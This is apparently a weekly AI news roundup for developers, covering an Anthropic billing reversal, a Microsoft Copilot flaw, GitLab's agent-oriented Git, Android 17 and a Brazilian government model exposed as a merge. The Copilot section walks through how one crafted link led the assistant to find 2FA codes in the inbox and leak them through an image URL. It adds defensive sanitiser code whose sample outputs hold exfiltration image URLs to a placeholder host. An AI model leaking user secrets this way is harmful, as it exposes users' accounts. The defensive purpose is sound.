A lot happened in AI this week. Anthropic changed its mind about billing. A flaw in Microsoft Copilot could leak your 2FA codes. And a “homegrown” government model turned out to be a copy of two other models.

Here is everything that matters for developers, in one short read.

1. Anthropic Paused Its Claude Billing Change

Anthropic was about to change how the Claude Agent SDK is billed. Then it backed down.

The plan was to move everyone onto tiered monthly credits:

| Plan | Monthly credits (planned) |
|---|---|
| Pro | about $20 of usage |
| Enterprise | up to $200 of usage |

Anything past your credits would bill at standard usage-based API rates. The plan would also have closed the third-party tricks people used to stretch a subscription.

Developers pushed back hard. On June 15 — the day the change was due — Anthropic paused it. Its words were short:

“Nothing changes for now.”

Why the U-turn? Two reasons. OpenAI is in a price war on tokens, so a price hike looks bad right now. And Anthropic just filed to go public. The last thing you want before an IPO is a billing change that pushes customers away.

Takeaway: if you build on the Agent SDK, your pricing is safe for now. But “for now” is doing a lot of work in that sentence. Keep an eye on it.

2. A Critical Flaw in Microsoft Copilot (Not GitHub Copilot)

Read this name carefully. The flaw is in Microsoft Copilot — the assistant built into Windows and Microsoft 365. It is not GitHub Copilot, the coding tool.

Researchers at Varonis Threat Labs found the flaw. They named it SearchLeak. It was rated critical, and Microsoft has now patched it.

Here is how the attack worked:

  1. The victim clicks one crafted link. That is the only action needed.
  2. Copilot searches the user’s own inbox on their behalf.
  3. It finds sensitive data — including two-factor authentication (2FA) codes.
  4. It sends that data out by loading an image whose URL contains the stolen text.

No malware. No second click. Just one link.

This is a new class of bug. When an AI assistant can read your inbox and fetch URLs, a single click can turn it into a data-theft tool.

To be clear about the names: GitHub Copilot had its own, separate problems earlier — CamoLeak in 2025 and RoguePilot in February 2026. But this week’s flaw is the Microsoft 365 one.

Takeaway: when you give an AI agent read access plus network access, you create an exfiltration path. Treat that combination as dangerous by default.
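
One way to close the image-URL channel described above is to filter the assistant's output before it is rendered. This is an added example, not Microsoft's fix or code from the Varonis research; the allowlisted host `static.example.com`, the `collector.invalid` sample URLs and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this deployment will load images from.
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)')  # ![alt](url "title")
REF_DEF = re.compile(r'^[ \t]*\[[^\]]+\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)  # [id]: url
HTML_IMG = re.compile(r'<img\b[^>]*>', re.I)  # raw HTML image tag

def image_allowed(url):
    """https only, allowlisted host, no query or fragment that could carry data."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
    except ValueError:
        return False
    return (parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS
            and not parts.query and not parts.fragment)

def sanitize(markdown):
    """Return (safe_markdown, blocked) for model output that is about to be rendered."""
    blocked = []

    def rule(url_group, replacement):
        def sub(m):
            # url_group 0 means "whole match": raw <img> tags are always dropped.
            if url_group and image_allowed(m.group(url_group)):
                return m.group(0)
            blocked.append(m.group(url_group))
            return replacement
        return sub

    out = MD_IMAGE.sub(rule(1, "[image removed]"), markdown)
    out = REF_DEF.sub(rule(1, ""), out)  # also drops link definitions to other hosts
    out = HTML_IMG.sub(rule(0, "[image removed]"), out)
    return out, blocked

# Constructed model output; hosts and the code value are made up for the example.
SAMPLE = (
    "Here is your summary.\n"
    "![logo](https://static.example.com/logo.png)\n"
    "![status](https://collector.invalid/p.png?d=code%3A123456)\n"
    "![chart][r]\n"
    "[r]: https://collector.invalid/q.png?d=abc\n"
)

if __name__ == "__main__":
    print(sanitize(SAMPLE))
```

An allowlisted host only helps if it cannot redirect or proxy requests to arbitrary destinations.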

3. GitLab Is Rebuilding Git for AI Agents

At its Transcend event on June 10–11, GitLab previewed a next-generation source code management system. In plain terms: a re-thought Git protocol on a distributed architecture.

Why rebuild Git at all? Git was designed for humans. A person commits a few times an hour. An AI agent commits constantly, all day. The old tooling was not built for that load.

GitLab shared some bold numbers:

| Claim | GitLab’s number |
|---|---|
| Agent task speed | up to 50x faster |
| Orbit context layer speed | 11x faster |
| Orbit token usage | 4.5x fewer tokens |

One important note: these are GitLab’s own claims, not independent benchmarks. Hold them loosely until others test them.

Takeaway: the direction is real even if the numbers are marketing. The plumbing under Git is starting to get rebuilt for a world where agents do most of the commits.

4. Android 17 Is Here

Android 17 shipped its stable release on June 16. It is rolling out to 21 Pixel devices (Pixel 6 and newer).

The headline features are all AI:

  • Gemini Omni — conversational video editing
  • Lyria 3 — turn text into music
  • AudioLM — speech-to-speech

There are also real multitasking upgrades:

  • A new bubble bar and App Bubbles — float any app as an overlay
  • A 50/50 split mode for gaming on foldables
  • AirDrop compatibility

Takeaway: if you ship Android apps, look at the new overlay and multitasking APIs first. Those are the changes that touch how your app behaves on screen.

5. A “Homegrown” AI Model Was Actually a Merge

This one is a reality check on the open-model rush.

Rio de Janeiro’s city IT authority, IplanRIO, released a model it called homegrown. The model was Rio 3.5 Open, a 397B-parameter model. It had reportedly beaten DeepSeek.

Then people looked under the hood. On June 14, researchers showed it was a merge of two existing models:

| Source model | Share (approx.) |
|---|---|
| Nex-N2-Pro | ~60% |
| Qwen 3.5 | ~40% |

The clearest tell: strip away its system prompt, and the model calls itself “Nex” 79% of the time. IplanRIO later updated the model card to admit the merge, blaming an “incorrect upload.”

You can run the same simple check on any model that claims to be original:

Without any system prompt, ask the model:
"What model are you? Who made you?"

If it names a different lab most of the time,
the "from scratch" story does not hold up.

Takeaway: as everyone races to ship a “sovereign” or in-house model, weight-merging makes it easy to dress up someone else’s work as your own. Check the model card. Check what the model calls itself.
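
The self-identification check above, turned into a repeatable measurement. This is an added example, not the researchers' tooling; `generate` is a hypothetical callable for whatever model endpoint you test, the name fragments in `FAMILIES` are assumptions, and the canned replies are constructed.

```python
import itertools
import re
from collections import Counter

PROBE = "What model are you? Who made you?"

# Assumption: name fragments to look for, grouped by the family they point to.
FAMILIES = {
    "Rio": ["rio", "iplanrio"],
    "Nex": ["nex"],
    "Qwen": ["qwen"],
}

def classify(reply):
    """Family whose name appears first in the reply, or None (first-mention heuristic)."""
    hits = []
    for family, names in FAMILIES.items():
        for name in names:
            m = re.search(rf"\b{re.escape(name)}\b", reply, re.I)
            if m:
                hits.append((m.start(), family))
    return min(hits)[1] if hits else None

def self_id_rates(generate, n):
    """Call generate(PROBE) n times and return the share of replies per family.

    generate is a hypothetical callable that sends the probe as the only
    message, with no system prompt, and returns the reply text.
    """
    counts = Counter(classify(generate(PROBE)) or "unidentified" for _ in range(n))
    return {family: count / n for family, count in counts.items()}

# Constructed replies standing in for a model endpoint (not real model output).
CANNED = [
    "I am Nex, a large language model.",
    "I'm Nex-N2-Pro.",
    "I am Qwen.",
    "I'm an AI assistant and can't share details about my training.",
    "I am Rio 3.5 Open, developed by IplanRIO.",
]

def canned_model():
    replies = itertools.cycle(CANNED)
    return lambda prompt: next(replies)

if __name__ == "__main__":
    print(self_id_rates(canned_model(), 10))
```

Run it with sampling enabled, since greedy decoding returns the same reply every time.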

The Real Trend

Step back and one theme connects all five stories: trust.

Anthropic blinked on pricing because losing developer trust before an IPO is expensive. One click could turn Microsoft Copilot against its own user. And a government model was not what it claimed to be.

As AI gets woven deeper into our tools, the hard question is not “which model is best.” It is “who do you trust, and how do you verify it?” That question is becoming the whole game.

Follow @kemal_codes on X and kemalcodes on GitHub. New AI news roundup every week.